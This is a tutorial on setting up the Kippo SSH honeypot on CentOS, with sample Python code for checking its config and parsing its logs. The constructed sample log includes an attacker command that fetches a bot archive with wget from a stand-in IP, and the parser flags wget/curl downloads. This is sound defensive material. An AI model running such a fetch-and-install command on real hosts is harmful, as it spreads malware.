How to set up the Kippo SSH Honeypot on CentOS 5.5
Kippo is a medium-interaction SSH honeypot designed to log brute-force attacks and, most importantly, the entire shell interaction performed by the attacker. Kippo is inspired by, but not based on, Kojoney. If you need more information about Kippo, visit its official site at http://code.google.com/p/kippo/ . This tutorial covers how to build and install Kippo on a CentOS 5.5 server.
I do not guarantee that this will work for you!
Python 2.6 installation
As you know, CentOS 5 ships only Python 2.4, so you need to install Python 2.6 using the tutorial at the following link:
http://www.geekymedia.com/tech-articles/rhel5-centos5-rpms-for-python-2-5-and-2-6/ 。
Important notes:
1) Install only the RPMs for the version you need. At minimum you need the base python package and the libs package.
2) To start Python 2.6, type python26 instead of python on the command line. (Your original Python 2.4 remains installed; do not replace /usr/bin/python, because yum and other CentOS tools depend on 2.4.)
3) If you install packages with setuptools, make sure you use the correct Python version (i.e. python26 setup.py install).
Twisted, Zope Interface and Pycrypto installation
Twisted is an event-driven networking engine written in Python and licensed under the MIT license. Twisted supports TCP, UDP, SSL/TLS, multicast, Unix sockets, a large number of protocols (including HTTP, NNTP, IMAP, SSH, IRC, FTP and others) and much more. Kippo is built on Twisted's SSH implementation (twisted.conch).
cd /tmp
wget http://twistedmatrix.com/Releases/Twisted/10.2/Twisted-10.2.0.tar.bz2
tar -xvf Twisted-10.2.0.tar.bz2
cd Twisted-10.2.0
python26 setup.py build
python26 setup.py install
Zope is an open-source web application server written mainly in Python. Kippo needs only its zope.interface package, which Twisted itself depends on.
cd /tmp
wget http://www.zope.org/Products/ZopeInterface/3.3.0/zope.interface-3.3.0.tar.gz
tar -xvf zope.interface-3.3.0.tar.gz
cd zope.interface-3.3.0
python26 setup.py build
python26 setup.py install
Pycrypto is a collection of cryptographic algorithms and protocols implemented for use from Python. Twisted's SSH support needs it for key exchange and ciphers.
cd /tmp
wget http://www.amk.ca/files/python/crypto/pycrypto-2.0.1.tar.gz
tar -xvf pycrypto-2.0.1.tar.gz
cd pycrypto-2.0.1
python26 setup.py build
python26 setup.py install
pyasn1 is an implementation of ASN.1 types and codecs (BER, CER, DER) in the Python programming language. Twisted's SSH key handling needs it.
cd /tmp
wget http://sourceforge.net/projects/pyasn1/files/pyasn1-devel/0.0.12a/pyasn1-0.0.12a.tar.gz/download
tar -xvf pyasn1-0.0.12a.tar.gz
cd pyasn1-0.0.12a
python26 setup.py build
python26 setup.py install
Create a regular user
Kippo must not be run as root! It is a program that deliberately accepts attacker input, so it should run with the least privilege possible. We therefore create a regular user for it.
useradd kippouser
Download the Kippo source package
You need to download the latest Kippo source package from http://kippo.googlecode.com . Do this as the user just created, so that the files are owned by it:
su - kippouser
wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz
tar -xvf kippo-0.5.tar.gz
cd kippo-0.5
Configure Kippo
vi kippo.cfg
#
# Kippo configuration file (kippo.cfg)
#

[honeypot]

# IP addresses to listen for incoming SSH connections.
#
# (default: 0.0.0.0) = any address
#ssh_addr = 0.0.0.0

# Port to listen for incoming SSH connections.
#
# (default: 2222)
ssh_port = 2222

# Hostname for the honeypot. Displayed by the shell prompt of the virtual
# environment.
#
# (default: sales)
hostname = sales

# Directory where to save log files in.
#
# (default: log)
log_path = log

# Directory where to save downloaded (malware) files in.
#
# (default: dl)
download_path = dl

# Directory where virtual file contents are kept in.
#
# This is only used by commands like 'cat' to display the contents of files.
# Adding files here is not enough for them to appear in the honeypot - the
# actual virtual filesystem is kept in filesystem_file (see below)
#
# (default: honeyfs)
contents_path = honeyfs

# File in the python pickle format containing the virtual filesystem.
#
# This includes the filenames, paths, permissions for the whole filesystem,
# but not the file contents. This is created by the createfs.py utility from
# a real template linux installation.
#
# (default: fs.pickle)
filesystem_file = fs.pickle

# Directory for miscellaneous data files, such as the password database.
#
# (default: data_path)
data_path = data

# Directory for creating simple commands that only output text.
#
# The command must be placed under this directory with the proper path, such
# as:
#   txtcmds/usr/bin/vi
# The contents of the file will be the output of the command when run inside
# the honeypot.
#
# In addition to this, the file must exist in the virtual
# filesystem {filesystem_file}
#
# (default: txtcmds)
txtcmds_path = txtcmds

# Public and private SSH key files. If these don't exist, they are created
# automatically.
#
# (defaults: public.key and private.key)
public_key = public.key
private_key = private.key

# Initial root password. Future passwords will be stored in
# {data_path}/pass.db
#
# (default: 123456)
password = 123456

# IP address to bind to when opening outgoing connections. Used exclusively by
# the wget command.
#
# (default: not specified)
#out_addr = 0.0.0.0

# Sensor name used to identify this honeypot instance. Used by the database
# logging modules such as mysql.
#
# If not specified, the logging modules will instead use the IP address of the
# connection as the sensor name.
#
# (default: not specified)
#sensor_name=myhostname

# Fake address displayed as the address of the incoming connection.
# This doesn't affect logging, and is only used by honeypot commands such as
# 'w' and 'last'
#
# If not specified, the actual IP address is displayed instead (default
# behaviour).
#
# (default: not specified)
#fake_addr = 192.168.66.254

# MySQL logging module
#
# Database structure for this module is supplied in doc/sql/mysql.sql
#
# To enable this module, remove the comments below, including the
# [database_mysql] line.
#[database_mysql]
#host = localhost
#database = kippo
#username = kippo
#password = secret
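Before starting the honeypot it is worth sanity-checking the [honeypot] section against the two constraints this tutorial imposes: Kippo runs as an unprivileged user, so ssh_port must stay above 1023 (port 22 is reached through an iptables redirect instead), and the values left at their defaults are easy for an attacker to recognise. The script below is an added example written for this page, not part of Kippo; it is Python 3 (not the Python 2.6 the tutorial installs), the config text is a constructed excerpt of the file above, and the individual checks are this editor's choices rather than anything Kippo enforces itself.

```python
import configparser

# Constructed kippo.cfg excerpt mirroring the tutorial's defaults (not read from
# disk); only the keys the checks below look at are included.
SAMPLE_CFG = """\
[honeypot]
#ssh_addr = 0.0.0.0
ssh_port = 2222
hostname = sales
log_path = log
download_path = dl
public_key = public.key
private_key = private.key
password = 123456
"""


def load_honeypot_section(text):
    """Parse kippo.cfg text and return its [honeypot] section."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return cp["honeypot"]


def check_config(text):
    """Return (severity, message) findings for settings that would bite at start-up or in use.

    The checks are this example's own; Kippo does not validate these itself.
    """
    hp = load_honeypot_section(text)
    findings = []
    port = hp.getint("ssh_port", fallback=2222)
    if port < 1024:
        findings.append(("error", f"ssh_port={port} is a privileged port; Kippo must not run as root, "
                                  "keep a high port and redirect 22 to it with iptables"))
    if not hp.get("password", fallback="").strip():
        findings.append(("error", "password is empty; the tutorial expects the initial root "
                                  "password here (default 123456)"))
    if hp.get("public_key") == hp.get("private_key"):
        findings.append(("error", "public_key and private_key point at the same file"))
    if hp.get("hostname", fallback="sales") == "sales":
        findings.append(("warning", "hostname is still the tutorial default 'sales', "
                                    "which marks the box as a stock Kippo install"))
    return findings


def redirect_rule(iface, port):
    """The tutorial's iptables REDIRECT, parameterised on interface and configured port."""
    return (f"iptables -t nat -A PREROUTING -i {iface} -p tcp --dport 22 "
            f"-j REDIRECT --to-port {port}")


if __name__ == "__main__":
    for sev, msg in check_config(SAMPLE_CFG):
        print(f"{sev}: {msg}")
    port = load_honeypot_section(SAMPLE_CFG).getint("ssh_port")
    # Print the redirect that matches whatever port the config actually uses.
    print(redirect_rule("eth0", port))
```

To run it against the real file, pass the contents of kippo.cfg to check_config() instead of SAMPLE_CFG. With the tutorial's defaults it reports only the hostname warning; changing ssh_port to 22 turns that into an error.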
Start Kippo
./start.sh
Log files
By default, Kippo's output is redirected to the file log/kippo.log. To watch the log data as it is written, use the following command:
tail -f log/kippo.log
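Tailing the log is enough to watch one session, but the questions you actually want answered after a few days are: which sources brute-forced the honeypot, which credentials they tried, who got a shell and what they fetched once inside. The parser below is an added example for this page, not code from Kippo; it reads the text log format that kippo.log uses (timestamp, Twisted log source in brackets, message). The sample lines are constructed for the example using documentation IP ranges, and the exact line layout is an assumption about Kippo 0.5's default logger, so adjust the regular expressions if your log differs.

```python
import re
from collections import Counter

# Constructed sample in the style of kippo 0.5's log/kippo.log. These lines are
# made up for this example (documentation IP ranges), and the exact line layout
# is an assumption about Kippo's default text logger, not a captured log.
SAMPLE_LOG = """\
2011-03-04 22:00:13+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:51022 (10.0.0.5:2222) [session: 1]
2011-03-04 22:00:14+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/admin] failed
2011-03-04 22:00:15+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/toor] failed
2011-03-04 22:00:16+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/123456] succeeded
2011-03-04 22:00:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,198.51.100.7] CMD: uname -a
2011-03-04 22:00:24+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,198.51.100.7] CMD: wget http://203.0.113.9/bot.tgz
2011-03-04 22:00:31+0000 [HoneyPotTransport,1,198.51.100.7] connection lost
2011-03-04 22:05:02+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.42:40211 (10.0.0.5:2222) [session: 2]
2011-03-04 22:05:03+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.42] login attempt [admin/admin] failed
2011-03-04 22:05:04+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.42] login attempt [root/password] failed
2011-03-04 22:05:05+0000 [HoneyPotTransport,2,203.0.113.42] connection lost
"""

# One log line: "<timestamp> [<twisted log source>] <message>"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<src>[^\]]*)\] (?P<msg>.*)$")
# Session id and client IP are embedded at the end of the transport name.
TRANSPORT_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)$")
LOGIN_RE = re.compile(r"^login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)$")
CMD_RE = re.compile(r"^CMD: (?P<cmd>.*)$")


def parse_kippo_log(text):
    """Group login attempts and shell commands by (session id, client IP)."""
    sessions = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable or continuation line: skip rather than crash
        t = TRANSPORT_RE.search(m.group("src"))
        if not t:
            continue  # factory-level messages (e.g. "New connection") carry no transport
        key = (int(t.group("sid")), t.group("ip"))
        s = sessions.setdefault(key, {"attempts": [], "success": None, "commands": []})
        msg = m.group("msg")
        lm = LOGIN_RE.match(msg)
        if lm:
            s["attempts"].append((lm.group("user"), lm.group("pw"), lm.group("result")))
            if lm.group("result") == "succeeded":
                s["success"] = (lm.group("user"), lm.group("pw"))
            continue
        cm = CMD_RE.match(msg)
        if cm:
            s["commands"].append(cm.group("cmd"))
    return sessions


def summarize(sessions):
    """Aggregate attempts per source, credentials tried, compromised sessions and downloads."""
    attempts_by_ip = Counter()
    credentials = Counter()
    compromised = []
    downloads = []
    for (sid, ip), s in sorted(sessions.items()):
        attempts_by_ip[ip] += len(s["attempts"])
        for user, pw, _ in s["attempts"]:
            credentials[(user, pw)] += 1
        if s["success"] is not None:
            compromised.append((sid, ip, s["success"], list(s["commands"])))
        for cmd in s["commands"]:
            first = cmd.split(None, 1)[0] if cmd.strip() else ""
            if first in ("wget", "curl"):  # fetches worth pulling from download_path
                downloads.append((ip, cmd))
    return {"attempts_by_ip": attempts_by_ip, "credentials": credentials,
            "compromised": compromised, "downloads": downloads}


if __name__ == "__main__":
    report = summarize(parse_kippo_log(SAMPLE_LOG))
    for ip, n in report["attempts_by_ip"].most_common():
        print(f"{ip}: {n} login attempts")
    for (user, pw), n in report["credentials"].most_common(5):
        print(f"  {user}/{pw}: {n}")
    for sid, ip, (user, pw), cmds in report["compromised"]:
        print(f"session {sid} from {ip} logged in as {user}/{pw} and ran {len(cmds)} commands")
    for ip, cmd in report["downloads"]:
        print(f"download attempt from {ip}: {cmd}")
```

For a real deployment replace SAMPLE_LOG with the contents of log/kippo.log (for example summarize(parse_kippo_log(open("log/kippo.log").read()))). Sessions that never authenticate still appear in attempts_by_ip, so a pure brute-force source is counted even though it never reaches the shell.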
Note: how to make Kippo reachable from the outside world!
By default Kippo listens on port 2222. On Windows, port 22 is usually unused and Kippo can be run on that port directly. On Linux only root can bind port 22, and Kippo must not run as root, so redirect incoming port 22 traffic to 2222 with iptables instead (quoting #twisted):
iptables -t nat -A PREROUTING -i IN_IFACE -p tcp --dport 22 -j REDIRECT --to-port 2222
Replace IN_IFACE with the real interface name, e.g. eth0! Two caveats: the redirect applies to every port 22 connection arriving on that interface, so if the host's real sshd also listens on 22 you will lock yourself out of the box; move the real sshd to another port first. And the PREROUTING chain only sees packets arriving from the network, so connections made on the host itself (such as the local test below) are not redirected; keep testing against port 2222. The rule is not persistent across reboots unless you save it (service iptables save on CentOS).
Testing
Connect to the Kippo server on port 2222 with username root and password 123456 (the initial root password from kippo.cfg):
ssh 127.0.0.1 -p 2222 -l root
After a successful login you should see the following prompt, built from the hostname configured above:
sales:~#
Links
Honeynet Project: http://www.honeynet.org/
Honeypot: http://en.wikipedia.org/wiki/Honeypot_(computing)
Kippo project: http://kippo.googlecode.com/
Iranian Honeynet Project: http://www.honeynet.ir/
CentOS: http://www.centos.org/